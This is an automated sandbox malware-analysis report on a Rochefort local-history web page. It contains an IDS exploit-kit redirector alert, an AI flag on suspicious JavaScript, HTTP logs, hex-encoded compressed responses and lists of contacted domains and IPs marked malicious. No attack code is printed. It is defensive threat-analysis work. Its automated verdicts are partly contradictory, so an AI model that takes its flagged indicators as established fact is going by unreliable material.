Edit tour

Windows Analysis Report
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm

Overview

General Information

Sample URL:	http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm
Analysis ID:	1591704
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Suricata IDS alerts for network traffic

AI detected suspicious Javascript

Detected non-DNS traffic on DNS port

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2228,i,40194613157235526,1828511126524788873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Suricata Signatures

ET EXPLOIT_KIT Evil Redirector Leading to EK Dec 09

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T10:25:20.149922+0100	2022242	1	Exploit Kit Activity Detected	62.210.16.62	80	192.168.2.4	49740	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected suspicious Javascript

Source: 0.0.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: http://www.bordeaux-doc.com/ville_de_rochefort/Roc... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It attempts to manipulate the DOM and execute arbitrary code, which poses a significant security risk. The script's overall behavior is highly suspicious and indicates potential malicious intent.

Source: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm

HTTP Parser: No favicon

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2022242 - Severity 1 - ET EXPLOIT_KIT Evil Redirector Leading to EK Dec 09 : 62.210.16.62:80 -> 192.168.2.4:49740

Source: global traffic

TCP traffic: 192.168.2.4:50894 -> 162.159.36.2:53

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 15 Jan 2025 09:25:20 GMTContent-Type: text/htmlContent-Length: 3792Connection: keep-aliveLast-Modified: Sun, 20 Jan 2013 20:40:34 GMTETag: "2877-4d3be5b3b0b2c-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipData Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 5a d9 72 1b b9 15 7d d7 57 c0 4c cd 44 8a b9 35 77 5a 24 6b 64 45 ca 4c 32 5e 4a 56 9c 4a 4d f9 01 dd 0d 92 b0 9a 0d 1a 8d 26 c5 71 f9 83 f2 97 39 17 e8 8d 14 25 27 ce cc 53 54 96 d5 0b ee 82 bb 9e 0b 72 b2 34 ab 68 76 72 32 59 0a 1e ce 4e 26 2b 61 38 5b 1a b3 6e 88 4f a9 dc 4c 6b 97 2a 36 22 36 8d db dd 5a d4 4e 02 77 37 ad 19 71 6f 5a 44 7b ce 82 25 d7 89 30 53 99 a8 c6 68 d4 1f 37 bc 5a ce 28 e6 2b 31 ad 85 22 09 b4 5c 1b a9 e2 0a 87 9f 62 a6 74 28 34 33 8a ad b5 32 22 30 ec 46 05 4b 31 57 da d4 99 59 0a 76 fd e6 e6 96 bd 7c f3 cf 8b 9b 3f d3 92 8f b4 64 cb 13 c6 d7 b8 db 88 90 f9 3b f6 52 c5 7c cd b5 11 4d f6 26 66 9c ad 64 24 0d d7 3b b6 56 32 36 4c cd d9 46 8a 6d 9d 49 47 aa fc 44 45 82 56 bf 4c 0d 44 87 7c 47 af 24 98 32 6c 82 41 38 ae fe a1 74 14 b2 ad 0c 05 9b f3 95 4a 13 76 fb 9e 2d b0 99 e6 c1 d6 ee c4 6e 8b 5d 24 35 56 ec eb 2f 17 af ae de d5 0f d6 fd e5 ea f5 d5 cd c5 ed 9b 9b ca c2 57 32 d0 2a 51 73 c3 ae 35 9e bd e5 0b c1 ae ee d7 5a 24 09 eb 34 db c4 c1 48 13 89 d9 35 0c 82 7d ee b8 0e 27 2d f7 e8 64 d2 72 0e 3b 99 f8 2a dc 31 9f 07 77 0b ad d2 38 9c d6 9a cd d6 5b 19 98 d6 2b af b9 90 f3 1a f3 17 81 8a 94 9e d6 fe 70 6d 7f 88 f1 b3 46 83 5d 4b 2d de 49 23 58 a3 31 7b f0 00 b2 b9 1f 09 e6 5b 1f 4d 6b ed 1a 99 c3 2c a7 35 af dd fe 0e 2c 18 7e 26 46 bb 0b 77 13 b2 0d 8f e4 22 46 74 a8 75 b1 be d3 c7 f2 89 5c 2d 58 a2 83 52 3b ec c7 aa 57 d0 67 cb 7b 9d 1a 5b 0a b9 58 c2 42 dd 3e 28 5b 26 fc ba 90 e1 71 21 14 4f 47 a5 74 fa fd 52 4c 7f 08 5a bf ba 95 42 26 ae 34 19 db 1a 83 ac bd 76 2b 27 ad b5 b5 99 df f7 85 f0 c8 80 2e c4 99 41 9a 64 d9 f1 91 6f b8 7b 5a 63 11 8f 17 29 1c 3c ad 55 9f ce d8 ff ed cf 76 3b dd ca 38 54 db 73 d4 98 4d ed 79 8d 47 b5 73 39 3f dd 6e 9b a1 0a d2 15 32 e4 cc e8 dd e7 fc a6 49 61 3e f5 3a e7 5f 02 6e 82 e5 e9 22 4c 16 49 b8 38 fb cc 93 70 da 3e a7 a5 9f a6 c5 e2 40 0b 6e c4 55 24 e8 ee b4 16 ca 4d ed 2c a7 fc e4 68 bc f3 2f 10 f7 0c 97 67 9f b7 d3 cf fc c5 76 fb a5 c9 49 1b 51 6b 22 47 b1 f8 74 03 a2 2f 62 ba fd 65 f3 81 74 f3 ce 3e cf a7 b1 d8 b2 0b ad f9 ee b4 d7 ae 7b 6d af ee 79 7d fc 1d d6 c7 e3 ec b2 8b df 11 ae db f5 ae 57 ef 8e ec bf 4e dd eb e0 d7 ab 0f e9 9a 9e b7 eb 1d 22 18 d5 c7 03 fc e9 d8 3b 90 e1 55 7f ec 6e da 96 c7 78 88 3f 3d dc 66 8f 2c eb 6e bd 37 a8 8f 47 96 10 7f ec 9a 3e 69 30 18 b8 15 76 e5 d0 2d 69 db 97 a4 05 bd ec 67 4a 83 b0 e4 da 1d d2 7b 08 c6 63 a2 ae 67 ca 5b 25 49 79 f0 ea f5 2c 15 29 03 b6 78 d5 b7 fb ea d2 fa 8e d5 c9 f3 68 2b d8 c0 80 16 f7 86 b4 35 ab 81 97 c9 cd d4 6f 0f ed c6 f3 7b d2 9e 54 22 2e 6d a7 16 6c d5 eb 67 7c 1d a7 91 d3 95 2c 91 6d c8 da db 23 43 38 01 1d bb a2 3b 26 bd 1e 1a 1a 72 88 a3 d5 12 bf 1d 2f f7 59 af 9b 6d ab ed de 58 99

Source: global traffic	HTTP traffic detected: GET /ville_de_rochefort/Roch/LR/Boya-uk.htm HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ville_de_rochefort/Roch/Pict/Boy.gif HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ville_de_rochefort/Roch/Pict/Roch.gif HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ville_de_rochefort/Roch/Pict/Boya.jpg HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ville_de_rochefort/Roch/Pict/Boya1.jpg HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ville_de_rochefort/Roch/Pict/Env2.gif HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ville_de_rochefort/Roch/Pict/M1.gif HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ville_de_rochefort/Roch/Pict/Boy.gif HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ville_de_rochefort/Roch/Pict/Roch.gif HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ville_de_rochefort/Roch/Pict/Env2.gif HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ville_de_rochefort/Roch/Pict/Boya1.jpg HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ville_de_rochefort/Roch/Pict/Boya.jpg HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.bordeaux-doc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: www.bordeaux-doc.com
Source: global traffic	DNS traffic detected: DNS query: adriennvendeghaz.hu
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: 212.20.149.52.in-addr.arpa

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Jan 2025 09:25:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 31 30 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 50 4d 6f 83 30 0c bd f3 2b bc 9e b6 43 63 5a 21 6d 87 28 d2 56 a8 56 89 76 a8 83 c3 4e 55 20 66 20 51 c2 92 50 b6 7f bf d0 6a d2 2e 96 3f 9e df f3 33 bf 8b df 36 f9 47 96 c0 6b be 4f 21 2b 5e d2 dd 06 16 4b c4 5d 92 6f 11 e3 3c be 4d d6 2c 44 4c 0e 0b 11 f0 c6 9d 3b c1 1b 92 ca 17 ae 75 1d 89 28 8c e0 a0 1d 6c f5 d8 2b 8e b7 66 c0 f1 0a e2 a5 56 3f f3 de 4a fc c3 f8 2a e0 83 c8 1b 02 43 5f 23 59 47 0a 8a 63 0a 78 69 bb 8e 4e 8a 4e 46 57 0d d5 da 38 3c fa 0c b3 b6 72 b8 5f b1 cf b6 86 49 5a e8 3d 59 3d 93 81 ee c1 35 ad 05 4b e6 42 86 71 1c 66 39 e3 83 54 ca 90 b5 e2 79 90 9e 0b d7 2c 62 8f 70 5f 94 63 ef c6 07 78 bf e2 41 3a 98 a6 89 95 da 28 92 e3 f7 52 e9 8a 55 fa 0c 99 97 86 a7 90 e3 1f 8b 77 74 f5 e2 af 9f 7f 10 fc 02 d9 8a 35 ac 3e 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 107MPMo0+CcZ!m(VVvNU f QPj.?36GkO!+^K]o<M,DL;u(l+fV?J*C_#YGcxiNNFW8<r_IZ=Y=5KBqf9Ty,bp_cxA:(RUwt5>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Jan 2025 09:25:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 31 30 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 50 4d 6f 83 30 0c bd f3 2b bc 9e b6 43 63 5a 21 6d 87 28 d2 56 a8 56 89 76 a8 83 c3 4e 55 20 66 20 51 c2 92 50 b6 7f bf d0 6a d2 2e 96 3f 9e df f3 33 bf 8b df 36 f9 47 96 c0 6b be 4f 21 2b 5e d2 dd 06 16 4b c4 5d 92 6f 11 e3 3c be 4d d6 2c 44 4c 0e 0b 11 f0 c6 9d 3b c1 1b 92 ca 17 ae 75 1d 89 28 8c e0 a0 1d 6c f5 d8 2b 8e b7 66 c0 f1 0a e2 a5 56 3f f3 de 4a fc c3 f8 2a e0 83 c8 1b 02 43 5f 23 59 47 0a 8a 63 0a 78 69 bb 8e 4e 8a 4e 46 57 0d d5 da 38 3c fa 0c b3 b6 72 b8 5f b1 cf b6 86 49 5a e8 3d 59 3d 93 81 ee c1 35 ad 05 4b e6 42 86 71 1c 66 39 e3 83 54 ca 90 b5 e2 79 90 9e 0b d7 2c 62 8f 70 5f 94 63 ef c6 07 78 bf e2 41 3a 98 a6 89 95 da 28 92 e3 f7 52 e9 8a 55 fa 0c 99 97 86 a7 90 e3 1f 8b 77 74 f5 e2 af 9f 7f 10 fc 02 d9 8a 35 ac 3e 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 107MPMo0+CcZ!m(VVvNU f QPj.?36GkO!+^K]o<M,DL;u(l+fV?J*C_#YGcxiNNFW8<r_IZ=Y=5KBqf9Ty,bp_cxA:(RUwt5>0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50986
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: classification engine

Classification label: mal52.win@17/22@12/5

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2228,i,40194613157235526,1828511126524788873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2228,i,40194613157235526,1828511126524788873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Boya.jpg	0%	Avira URL Cloud	safe
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Roch.gif	0%	Avira URL Cloud	safe
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Boya1.jpg	0%	Avira URL Cloud	safe
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Boy.gif	0%	Avira URL Cloud	safe
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Env2.gif	0%	Avira URL Cloud	safe
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/M1.gif	0%	Avira URL Cloud	safe
http://www.bordeaux-doc.com/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.google.com	142.250.185.228	true	false	high
pf17-web.online.net	62.210.16.62	true	true	unknown
adriennvendeghaz.hu	unknown	unknown	false	unknown
www.bordeaux-doc.com	unknown	unknown	true	unknown
171.39.242.20.in-addr.arpa	unknown	unknown	false	high
212.20.149.52.in-addr.arpa	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Boy.gif	true	Avira URL Cloud: safe	unknown
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Roch.gif	true	Avira URL Cloud: safe	unknown
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Boya1.jpg	true	Avira URL Cloud: safe	unknown
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Env2.gif	true	Avira URL Cloud: safe	unknown
http://www.bordeaux-doc.com/favicon.ico	true	Avira URL Cloud: safe	unknown
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Boya.jpg	true	Avira URL Cloud: safe	unknown
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/M1.gif	true	Avira URL Cloud: safe	unknown
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm	false		unknown
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm#anchorCPP	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.228	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
62.210.16.62	pf17-web.online.net	France	12876	OnlineSASFR	true
142.250.186.100	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591704
Start date and time:	2025-01-15 10:24:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.win@17/22@12/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.67, 172.217.16.206, 74.125.206.84, 142.250.185.110, 142.250.186.78, 199.232.210.172, 2.23.77.188, 142.250.186.46, 142.250.181.238, 142.250.181.227, 142.250.184.206, 2.23.242.162, 20.109.210.53, 20.242.39.171, 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm

Input	Output
URL: http://www.bordeaux-doc.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: http://www.bordeaux-doc.com
URL: http://www.bordeaux-doc.com/ville_de_rochefort/Roc... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It attempts to manipulate the DOM and execute arbitrary code, which poses a significant security risk. The script's overall behavior is highly suspicious and indicates potential malicious intent." }
